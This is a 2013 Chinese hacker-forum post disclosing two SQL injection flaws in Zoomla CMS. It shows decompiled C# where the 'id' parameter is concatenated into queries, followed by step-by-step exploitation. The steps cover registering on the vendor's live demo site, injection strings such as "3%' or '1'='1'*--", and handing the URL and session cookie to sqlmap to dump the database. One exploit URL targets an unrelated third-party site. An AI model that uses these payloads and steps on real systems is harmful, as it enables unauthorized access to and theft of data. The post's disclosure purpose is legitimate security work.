查看: 14047|回复: 2

逐浪CMS通用型SQL注入8+9(select型)

[复制链接]
  • TA的每日心情

    2023-4-12 21:54
  • 签到天数: 404 天

    [LV.9]以坛为家II

    发表于 2013-12-24 20:54:47 | 显示全部楼层 |阅读模式
    本帖最后由 Petrel 于 2013-12-24 20:54 编辑

    漏洞类型: SQL注射漏洞
    简要描述:

    似乎逐浪开始想完全闭源了。已经准备阻止大家进行反编译了,暂时还不知道是用什么方法,以后如果研究出来的话再说吧。所以官方别再扯什么XXX源码包了,不开源不是丢人的事情,但是忽悠客户不是很好吧。
    详细说明:

    相关的类:

    public class MIS_Target_planList : Page, IRequiresSessionState

    public class MIS_Target_ProList : Page, IRequiresSessionState

    漏洞证明:

    注入点1:
        public class MIS_Target_planList : Page, IRequiresSessionState
         
        protected void Page_Load(object sender, EventArgs e)
         
        {
         
        this.buser.CheckIsLogin();
         
        if (!base.IsPostBack && !string.IsNullOrEmpty(base.Request["id"]))
         
        {
         
        this.id = DataConverter.CLng(base.Request["id"]); //id参数第一次过滤了
         
        thisthis.dt = this.bll.Sel("MID =" + base.Request["id"], "ID desc"); //id参数第二次直接带入查询中了
         
        if (this.dt != null && this.dt.Rows.Count > 0)
         
        {
         
        thisthis.Repeater3.DataSource = this.dt;
         
        this.Repeater3.DataBind();
         
        }
         
        }
         
        }


    前台注册用户。

    http://demo.zoomla.cn/Mis/Plan/AddPlan.aspx

    添加计划

    访问http://demo.zoomla.cn/mis/target/planList.aspx?id=0

    可以看见计划都列出来了,把上面这个URL丢到工具里面,带上cookie即可:

    1_131224184701_1.png




    注入点2:
        public class MIS_Target_ProList : Page, IRequiresSessionState
         
        protected global_asax ApplicationInstance
         
        {
         
        get
         
        {
         
        return (global_asax)this.Context.ApplicationInstance;
         
        }
         
        }
         
        protected void Page_Load(object sender, EventArgs e)
         
        {
         
        this.buser.CheckIsLogin();
         
        if (!base.IsPostBack && !string.IsNullOrEmpty(base.Request["types"]) && base.Request["types"].ToString() == "7" && !string.IsNullOrEmpty(base.Request["id"]))
         
        {
         
        this.id = DataConverter.CLng(base.Request["id"]);
         
        thisthis.dt = this.bll.Sel("TargetID like '%" + base.Request["id"] + "%' And IsSystem=0 ", "ID desc"); //id参数没有过滤就带入SQL查询
         
        if (this.dt != null && this.dt.Rows.Count > 0)
         
        {
         
        thisthis.Repeater3.DataSource = this.dt;
         
        this.Repeater3.DataBind();
         
        }
         
        }
         
        }

    注册前台用户并登录

    http://demo.zoomla.cn/Mis/Project/Default.aspx

    点击新建项目

    随意新建一个项目。

    打开http://demo.zoomla.cn/mis/target/prolist.aspx?types=7&id=3

    页面空白

    打开http://demo.zoomla.cn/mis/target/prolist.aspx?types=7&id=3%' or '%'='

    所有添加的项目信息都在里面

    把下面的链接还有cookie丢sqlmap就可以暴数据了

    http://www.yunsec.net/mis/target/prolist.aspx?types=7&id=3%' or '1'='1'*--

    1_131224184846_1.png
    1_131224184846_2.png
    回复

    使用道具 举报

  • TA的每日心情
    郁闷
    2015-6-8 19:18
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2013-12-24 21:00:06 | 显示全部楼层
    沙发耶、、、、、、、
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2023-4-26 23:35
  • 签到天数: 237 天

    [LV.7]常住居民III

    发表于 2013-12-25 12:31:58 | 显示全部楼层
    不错不错   顶   
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-22 19:33 , Processed in 0.033429 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部